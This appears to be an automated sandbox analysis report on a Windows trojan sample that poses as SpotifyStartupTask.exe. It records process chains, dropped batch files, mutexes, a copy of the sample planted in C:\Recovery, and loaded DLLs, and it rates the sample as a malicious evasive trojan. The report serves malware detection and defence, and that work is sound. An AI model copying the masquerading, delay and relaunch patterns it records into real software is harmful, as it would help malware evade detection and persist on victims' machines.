Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C230E79	32_2_00007FFD9C230E79
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C221BD6	32_2_00007FFD9C221BD6
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C22C265	32_2_00007FFD9C22C265
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C21448F	32_2_00007FFD9C21448F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C21632F	32_2_00007FFD9C21632F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BAD168A	38_2_00007FFD9BAD168A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BAD9A7A	38_2_00007FFD9BAD9A7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BAB0C66	38_2_00007FFD9BAB0C66
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BAA0D48	38_2_00007FFD9BAA0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BAA0E43	38_2_00007FFD9BAA0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BB07D0F	38_2_00007FFD9BB07D0F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BE712E0	38_2_00007FFD9BE712E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BE712CF	38_2_00007FFD9BE712CF
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BEB10F2	38_2_00007FFD9BEB10F2
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BEB0EE0	38_2_00007FFD9BEB0EE0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9BEB0E98	38_2_00007FFD9BEB0E98
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9C1F16E0	38_2_00007FFD9C1F16E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9C20632F	38_2_00007FFD9C20632F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 38_2_00007FFD9C211370	38_2_00007FFD9C211370

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BBFiueAC.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986

Source: wQKprcQn.log.0.dr

Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: FuWRu2Mg82.exe, 00000000.00000002.1725528471.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Ex vs FuWRu2Mg82.exe
Source: FuWRu2Mg82.exe, 00000000.00000000.1653868768.00000000005A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs FuWRu2Mg82.exe
Source: FuWRu2Mg82.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs FuWRu2Mg82.exe

Source: FuWRu2Mg82.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: FuWRu2Mg82.exe, tOWRGy4qUJmhaaSFJSA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: wQKprcQn.log.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@86/251@1/1

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

File created: C:\Users\user\Desktop\fiPsZiXa.log

Jump to behavior

Source: C:\Recovery\axnJvpyQnMRKSw.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-7jlTI5ViwtbGbzplUVv1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

File created: C:\Users\user\AppData\Local\Temp\2LXfWnm1ym

Jump to behavior

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat"

Source: FuWRu2Mg82.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FuWRu2Mg82.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FuWRu2Mg82.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

File read: C:\Users\user\Desktop\FuWRu2Mg82.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FuWRu2Mg82.exe "C:\Users\user\Desktop\FuWRu2Mg82.exe"
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
